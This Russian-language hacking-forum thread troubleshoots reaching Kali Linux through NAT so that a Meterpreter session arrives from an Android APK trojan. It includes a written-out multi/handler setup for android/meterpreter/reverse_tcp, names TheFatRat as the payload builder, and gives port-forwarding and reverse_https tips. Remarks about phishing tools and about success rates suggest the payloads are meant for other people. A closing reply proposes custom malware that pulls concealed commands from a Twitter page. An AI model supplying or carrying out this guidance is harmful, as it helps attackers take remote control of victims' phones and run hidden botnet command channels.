Проброс Kali за NAT

[ghostphisher]

А если взять браузер и открыть локально? К примеру с браузера винды но

Ссылка скрыта от гостей

тачки с Линукс порт по умолчанию 80

 

[NigaMan]

А если взять браузер и открыть локально? К примеру с браузера винды но

Ссылка скрыта от гостей

тачки с Линукс порт по умолчанию 80

не понял, я должен в браузере в винде открыть этот файл через

Ссылка скрыта от гостей

, так? если так, то не открывается

 

[ghostphisher]

не понял, я должен в браузере в винде открыть этот файл через

Ссылка скрыта от гостей

, так? если так, то не открывается

да и 80 можно не писать

 

[NigaMan]

да и 80 можно не писать

не открывается

 

[ghostphisher]

не открывается

А апач запущен на кали?

 

[NigaMan]

запустил, ввел ip получилось это

 

[ghostphisher]

запустил, ввел ip получилось это

Мана тулкит была использована? Смысл в следующем - порты у тебя норм, а это фигня похоже от твоих исптыаний разных утилит для фишинга, которые ты не зачистил. Теперь, открываешь лист порта с метасплоит и делаешь проброс его, а свой телефон на андроид юзаешь через 3G и кидаешь на него свои заготовки и тестишь

 

[NigaMan]

Мана тулкит была использована? Смысл в следующем - порты у тебя норм, а это фигня похоже от твоих исптыаний разных утилит для фишинга, которые ты не зачистил. Теперь, открываешь лист порта с метасплоит и делаешь проброс его, а свой телефон на андроид юзаешь через 3G и кидаешь на него свои заготовки и тестишь

Теперь, открываешь лист порта с метасплоит и делаешь проброс его, про это можно поконкретнее?

 

[ghostphisher]

Теперь, открываешь лист порта с метасплоит и делаешь проброс его, про это можно поконкретнее?

Все тоже самое как в локальной сети делал со своим андроидом и пробрось порт, ты же делал это с 80 и 9999

 

[NigaMan]

Все тоже самое как в локальнгй сети делал и пробрось порт, ты же делал это с 80 и 9999

то есть, я запустил апачи и теперь повторяю процедуру? и про порт я не понял слегка, просто этим всего неделю, от силы 2 занимаю, и еще не все до конца понимаю)

 

[ghostphisher]

то есть, я запустил апачи и теперь повторяю процедуру? и про порт я не понял слегка, просто этим всего неделю, от силы 2 занимаю, и еще не все до конца понимаю)

Ты писал - что уже делал в локальнгой сети и все получилось с получением сессии. Откуда тут у тебя Апач? Ты на что принимаешь связь от запущенного файла с нагрузкой? И на какой порт? Вот на который порт ожидаешь в метиаплоите связь его и прокидывай

 

[NigaMan]

Ты писал - что уже делал в локальнгой сети и все получилось с получением сессии. Откуда тут у тебя Апач? Ты на что принимаешь связь от запущенного файла с нагрузкой? И на какой порт? Вот на который порт ожидаешь в метиаплоите связь его и прокидывай

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.**.**
set lport 9999
exploit -j
все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется
apk файл я создаю с помощью fatrat

 

[ghostphisher]

exploit -j
все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется
apk файл я создаю с помощью fatrat

в роутере прописал что у тебя 9999 идет на 9999 ?

И еще - не факт файл сработает. Из 100 если 1 сработает уже хорошо.

 

[NigaMan]

в роутере прописал что у тебя 9999 идет на 9999 ?

И еще - не факт файл сработает. Из 100 если 1 сработает уже хорошо.

порт прописан

 

[ghostphisher]

порт прописан

Пробуем reverse_https создать и порт возьми другой

 

[NigaMan]

Пробуем reverse_https создать и порт возьми другой

lhost прописывает ipv4 или ipv6?

 

[ghostphisher]

lhost прописывает ipv4 или ipv6?

Пропиши свой инет адрес который IP

 

[a113]

А то что IP может быть серый? (как у меня)

 

[NigaMan]

А то что IP может быть серый? (как у меня)

вот скорее всего и у меня

 

[a113]

вот скорее всего и у меня

Таким образом могу сказать: 1) купить у провайдера белый IP адрес. Тут очень много подводных камней и проблем
2) Написать свою малварь, которая будет брать команды из доверенного места и не будет вызывать подозрений. То есть будет коннектиться к, допустим, твиттеру, парсить страничку и искать на ней комманды, которые, к примеру, будут начинаться с OMG! а дальше /SlVTVCBBIFRFU1Q=/ и выполнять то, что в //. Так кстати передавали команды ботнету со страницы перис хилтон вроде